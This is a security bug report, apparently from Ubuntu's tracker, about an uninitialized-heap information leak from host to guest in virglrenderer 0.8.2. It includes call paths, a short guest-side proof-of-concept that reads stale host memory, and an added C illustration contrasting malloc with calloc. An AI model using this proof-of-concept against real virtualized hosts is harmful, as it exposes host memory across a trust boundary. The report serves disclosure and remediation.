information leak from host to guest in the virglrenderer

Bug #1950784 reported by Jun Yao
Affects                   Status        Importance  Assigned to  Milestone
virglrenderer (Ubuntu)    Fix Released  Undecided   Unassigned
  Bionic                  Triaged       Undecided   Unassigned
  Focal                   Fix Released  Undecided   Unassigned
  Impish                  Fix Released  Undecided   Unassigned

Bug Description

Env
===
  Description: Ubuntu 20.04.3 LTS
  Release: 20.04

Package
=======
  virglrenderer_0.8.2

Vulnerability
=============
  gr->ptr is allocated without initialization in vrend_renderer_resource_create(). The code path is as follows:

virtio_gpu_virgl_process_cmd()
|
|-> virgl_cmd_create_resource_3d()
    |
    |-> virgl_renderer_resource_create()
        |
        |-> vrend_renderer_resource_create()
            |
            | if (args->target == PIPE_BUFFER && args->bind == VIRGL_BIND_CUSTOM) {
            |     gr->storage_bits |= VREND_STORAGE_HOST_SYSTEM_MEMORY;
            |     gr->ptr = malloc(args->width); // -- Here ---
            | }

The memory pointed to by gr->ptr can be read from the guest kernel. The code path is as follows:

virtio_gpu_virgl_process_cmd()
|
|-> virgl_resource_attach_backing()
    |
    |-> virgl_renderer_resource_attach_iov()
        |
        |-> vrend_renderer_resource_attach_iov()
            |
            | res = vrend_resource_lookup(res_handle, 0);
            | res->iov = iov;
            | res->num_iovs = num_iovs;
            | vrend_write_to_iovec(res->iov, res->num_iovs, 0,
            |                      res->ptr, res->base.width0); // -- Here ---

However, the memory holding the data can be mmapped into the guest userspace process, and we can leak lots of data, as the size of the heap buffer (args->width) is controlled by the user.

The PoC is as follows:

  dev = open(VIRTIO_GPU, O_RDONLY);                          /* virtio-gpu DRM node */
  ioctl(dev, DRM_IOCTL_VIRTGPU_RESOURCE_CREATE, &resource);  /* host: vrend_renderer_resource_create() -> malloc(width) */
  ioctl(dev, DRM_IOCTL_VIRTGPU_MAP, &vmap);                  /* host: attach_iov copies the uninitialized buffer to the guest pages */
  ptr = mmap(0, MAP_SZ, PROT_READ, MAP_SHARED, dev, vmap.offset);
  for (i = 0; i < WIDTH/sizeof(*ptr); i++)                   /* stale host heap contents are now readable */
      LOG("leak: ptr[%d]=%#lx\n", i, ptr[i]);
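
The following is an added illustration of the root cause described in this report and of the mitigation; it is not code from the report or from virglrenderer, and every name in it (host_malloc, resource_create, attach_backing, stale_bytes_visible_to_guest) is hypothetical. It models the host heap as a small arena pre-seeded with constructed "stale" data so the result is deterministic, creates a resource of guest-chosen width with and without zero-initialization, copies the storage to the guest-visible buffer the way attach_iov does, and counts how many stale bytes the guest can read.

```c
/* Added illustration (not virglrenderer code): an uninitialized host-side
 * allocation becomes a guest-readable information leak once its contents
 * are copied into guest-backed pages; zero-filling at allocation removes
 * the leak. All names here are hypothetical. */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Stand-in for the host process heap. A bump allocator over a static
 * arena keeps the example deterministic; the arena is pre-seeded with a
 * constructed marker to model whatever a previous user of that heap
 * region left behind (in the real bug: malloc() handing back recycled
 * host memory). */
#define ARENA_SIZE 4096
static uint8_t host_arena[ARENA_SIZE];
static size_t host_arena_used;

static const char STALE_MARKER[] = "CONSTRUCTED-STALE-HOST-DATA";  /* constructed */

static void host_heap_reset(void) {
    size_t mlen = sizeof(STALE_MARKER) - 1;   /* marker bytes, no NUL */
    host_arena_used = 0;
    for (size_t i = 0; i < ARENA_SIZE; i += mlen) {
        size_t n = (ARENA_SIZE - i < mlen) ? ARENA_SIZE - i : mlen;
        memcpy(host_arena + i, STALE_MARKER, n);
    }
}

/* Models malloc(): returns memory without clearing it. */
static void *host_malloc(size_t n) {
    if (host_arena_used + n > ARENA_SIZE) return NULL;
    void *p = host_arena + host_arena_used;
    host_arena_used += n;
    return p;
}

/* Models calloc(): same memory, but zero-filled before it is handed out. */
static void *host_calloc(size_t n) {
    void *p = host_malloc(n);
    if (p) memset(p, 0, n);
    return p;
}

/* Minimal resource object: backing storage plus its width, mirroring
 * res->ptr and res->base.width0 in the report. */
struct resource { uint8_t *ptr; size_t width; };

/* Modelled resource_create: the guest picks `width`. The only difference
 * between the vulnerable and the hardened path is whether the storage is
 * cleared before the guest can observe it. */
static bool resource_create(struct resource *res, size_t width, bool zero_init) {
    res->width = width;
    res->ptr = zero_init ? host_calloc(width) : host_malloc(width);
    return res->ptr != NULL;
}

/* Modelled attach_backing: copies the host storage into the guest-supplied
 * buffer (the iovec in the report), which the guest then mmaps and reads. */
static void attach_backing(const struct resource *res, uint8_t *guest_buf, size_t guest_len) {
    size_t n = res->width < guest_len ? res->width : guest_len;
    memcpy(guest_buf, res->ptr, n);
}

/* Number of non-zero (stale) bytes the guest can read after create+attach
 * for a resource of `width` bytes: every byte on the malloc() path, none
 * once the allocation is zero-initialized. Widths larger than the modelled
 * heap fail allocation and expose nothing. */
size_t stale_bytes_visible_to_guest(size_t width, bool zero_init) {
    static uint8_t guest_buf[ARENA_SIZE];
    struct resource res;
    size_t leaked = 0;

    host_heap_reset();
    if (width > ARENA_SIZE || !resource_create(&res, width, zero_init))
        return 0;
    memset(guest_buf, 0, sizeof guest_buf);
    attach_backing(&res, guest_buf, sizeof guest_buf);
    for (size_t i = 0; i < width; i++)
        if (guest_buf[i] != 0) leaked++;
    return leaked;
}

int main(void) {
    printf("malloc path: %zu stale bytes readable by guest\n",
           stale_bytes_visible_to_guest(256, false));
    printf("calloc path: %zu stale bytes readable by guest\n",
           stale_bytes_visible_to_guest(256, true));
    return 0;
}
```

The defender's takeaway is the contrast between the two allocation calls: any buffer whose contents will be copied to a less-trusted domain has to be fully initialized (calloc, or memset after malloc) before the copy, independent of what the guest later writes into it.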

Marc Deslauriers (mdeslaur) wrote :

Hi,

Have you reported this issue to the virglrenderer developers?

If not, please report it to them. The bug tracker is here:

https://gitlab.freedesktop.org/virgl/virglrenderer/-/issues

Once you have done that, please let us know the bug number and once a fix is available we will package it for Ubuntu.

Thanks!

Steve Beattie (sbeattie) wrote (last edit):

This was fixed in https://ubuntu.com/security/notices/USN-5309-1 for focal and newer; it is unfixed in bionic where virglrenderer is community maintained.

Changed in virglrenderer (Ubuntu Bionic):
status: New → Triaged
Changed in virglrenderer (Ubuntu):
status: New → Fix Released
Changed in virglrenderer (Ubuntu Focal):
status: New → Fix Released
Changed in virglrenderer (Ubuntu Impish):
status: New → Fix Released
information type: Private Security → Public Security
Steve Beattie (sbeattie)
tags: added: community-security